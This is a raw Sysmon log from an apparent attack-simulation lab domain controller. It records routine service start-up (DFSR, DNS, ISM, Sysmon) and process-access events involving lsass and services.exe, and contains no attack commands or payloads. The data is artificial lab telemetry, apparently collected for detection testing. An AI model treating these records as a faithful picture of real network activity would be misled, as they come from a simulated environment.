12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.127{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.076{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 17141700x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.112{266CAFBE-647C-6064-2C00-00000000AE01}2916\PSHost.132616656609980777.2916.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.098{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exe10.0.14393.4283 (rs1_release.210303-1802)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8548C5144E55B79299A0880858A9AF13,SHA256=1EA1D6DB68F92535811D71CA97C2B3A9F9D3409DE8C5FA089658E73B7D3A0689,IMPHASH=D38366C43D0F6223104A675303D8E8CB{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.096{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.072{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exe10.0.14393.4283 (rs1_release.210303-1802)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8DD15A9DA01C57E0C12E95A5B4A8D242,SHA256=CA8C55567793E0CF2D297E19736F5F5F88430CAB5E3EB9A2160052D39FC9F88D,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 17141700x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}856\efsrpcC:\Windows\system32\lsass.exe 
10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}8402500C:\Windows\system32\services.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}8402500C:\Windows\system32\services.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 